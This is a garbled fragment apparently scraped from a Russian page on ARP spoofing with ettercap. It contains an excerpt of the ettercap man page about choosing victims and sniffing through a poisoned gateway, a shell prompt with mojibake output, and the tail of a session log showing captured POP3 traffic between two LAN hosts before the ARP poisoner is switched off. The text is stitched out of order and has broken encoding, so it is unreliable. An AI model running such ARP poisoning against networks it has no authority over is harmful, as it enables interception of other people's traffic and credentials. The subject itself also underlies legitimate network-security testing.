In silent mode (-z option) only the first target is selected, if you want to poison mulâ
tiple target in silent mode use the -j option to load a list from a file.
You can select empty targets and they will be expanded as âANYâ (all the hosts in the
LAN). The target list is joined with the hosts list (created by the arp scan) and the
result is used to determine the victims of the attack.
The parameter "remote" is optional and you have to specify it if you want to sniff remote
ip address poisoning a gateway. Indeed if you specify a victim and the gw in the TARGETS,
ettercap will sniff only connection between them, but to enable ettercap to sniff connecâ
[user@debian7:~]$ man ettercap
ÐеÑеÑоÑмаÑиÑование ettercap(8), подождиÑе...
...
Mon Jul 27 19:27:27 2009
TCP 192.168.16.4:41149 --> 192.168.16.5:110 | FA
Mon Jul 27 19:27:27 2009
TCP 192.168.16.5:110 --> 192.168.16.4:41149 | FA
Mon Jul 27 19:27:27 2009
TCP 192.168.16.4:41149 --> 192.168.16.5:110 | A
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
ARP-Spoofing url --- http://xgu.ru/wiki/ARP-spoofing |